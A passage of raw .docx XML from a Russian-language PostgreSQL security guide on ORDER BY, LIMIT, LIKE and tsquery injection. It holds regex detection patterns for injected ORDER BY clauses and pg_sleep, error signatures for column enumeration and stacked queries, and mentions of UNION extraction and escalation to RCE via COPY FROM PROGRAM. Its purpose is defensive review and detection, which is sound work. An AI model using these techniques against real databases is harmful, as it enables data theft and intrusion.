          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    re.compile(r"\bORDER\s+BY\s+\{[a-z_][a-z0-9_]*\}", re.IGNORECASE),  # f"ORDER BY {sort}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2CBE4E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bORDER\s+BY\s+['\"]\s*\+\s*\w+", re.IGNORECASE),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488DA41B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDD7D9E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.14.4: subquery / CASE / pg_sleep в ORDER BY (runtime-сигнал)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5829001F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bORDER\s+BY\s*\(\s*(CASE|SELECT|pg_sleep)", re.IGNORECASE),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F68A7E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082BC677" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.14.3: ORDER BY с большим integer от endpoint (runtime-сигнал)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126969AC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bORDER\s+BY\s+\d{3,}\b", re.IGNORECASE),              # ORDER BY 99+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7107A5ED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D756903" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4A71EE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIMIT_ORDER_SIGNATURES = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F018922" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # runtime: PG-сторона</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F6B6BE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "ORDER BY position .* is not in select list",   # column-count enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCD653F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "cannot insert multiple commands into a prepared statement",  # stacked attempt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B21401" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B6366A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5452685C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIMIT_ORDER_RISK = 7   # high — direct UNION/RCE-канал при сочетании с 3.5/3.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787A61D1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Эти patterns ловят statically-detectable варианты на code-review. Runtime-signal через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + анализ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query</w:t>
      </w:r>
      <w:r>
        <w:t>-поля для production-детекции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A078B4F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Перекрёстные ссылки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E781D41" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 UNION-based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — основной канал извлечения для 3.14.1 (LIMIT-append UNION) и 3.14.3 (column-count enumeration → UNION).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4107325C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 Error-based via CAST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — error-канал в 3.14.3 (column-position error) и 3.14.4 (CAST в ORDER BY-subquery).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C23D4E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3 Boolean-based blind</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.14.4 (row-order boolean) — нативный boolean-channel через ORDER BY.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AB87D3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.4 Time-based blind</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.14.4 (pg_sleep в expression) — time-channel через ORDER BY-evaluation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70865E53" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 Stacked queries</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — driver-mode определяет, проходит ли </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t>-payload в 3.14.1/3.14.2/3.14.3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDD8A97" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.1 COPY FROM PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — escalation в RCE через stacked queries (3.14.3 Variant B).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671AA72F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16 Identifier injection в plpgsql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — серверная сторона identifier-injection (зеркало 3.14.2 для plpgsql functions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048C984F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.7 Дополнительные приёмы валидации</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общие шаблоны: type-coercion (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int()</w:t>
      </w:r>
      <w:r>
        <w:t>), whitelist через Enum, decompose-validate-rebuild для sort-spec.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BBC733" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Managed-провайдеры (RDS, Cloud SQL, Supabase)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED5A15A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Все четыре подраздела 3.14 — application-level mis-configurations, не зависящие от server-side privileges. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed-провайдеры не меняют картину</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449BF1E1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AWS RDS / Aurora PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: одинаковое поведение со self-hosted. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> доступен в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rdsadmin</w:t>
      </w:r>
      <w:r>
        <w:t>-предоставленном виде, что упрощает runtime-детекцию.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9B2C11" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Google Cloud SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: то же; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> включается через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cloudsql.enable_pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F64E29" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Supabase</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: PostgREST на стороне API делает свой parsing запросов, но если приложение строит SQL через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rpc()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с f-string в text — векторы 3.14 работают идентично.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68214765" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Database for PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:t>: то же поведение; нет provider-specific mitigation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBCD8FD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Provider-mitigation отсутствует</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — защита целиком application-level. Единственный provider-feature, релевантный к 3.14 — query-anomaly detection в RDS Performance Insights / Cloud SQL Insights, который может пометить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY (CASE ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от endpoint, где обычно простой sort.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADD3FF1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.15.0 Обзор</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EAFF2E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Injection в LIKE и tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — класс уязвимостей, где пользовательский ввод попадает в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pattern-семантику</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (LIKE-wildcards) или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>operator-language</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (tsquery), а не в обычную WHERE-сравнение. Это не классическая string-injection через кавычки — даже если ввод корректно escaped как SQL-литерал, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>сами символы внутри строки</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> имеют специальное значение для PostgreSQL pattern-парсера. Защита от обычной SQL-инъекции (bind-параметризация) не помогает: pattern-парсер всё равно интерпретирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;</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как операторы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064C60A8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>3.15 покрывает две независимые семантические поверхности:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B24B172" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LIKE-семейство</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIKE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ILIKE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SIMILAR TO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — wildcards </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (zero-or-more) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (any single char). Pattern идёт через обычный bind-параметр, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>символы внутри</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> интерпретируются движком как wildcards. Если приложение принимает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE name LIKE :search</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%admin%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> парсится как «всё, что содержит admin» — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не SQL injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, а </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pattern matching attack</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B846E6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tsquery-семейство</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
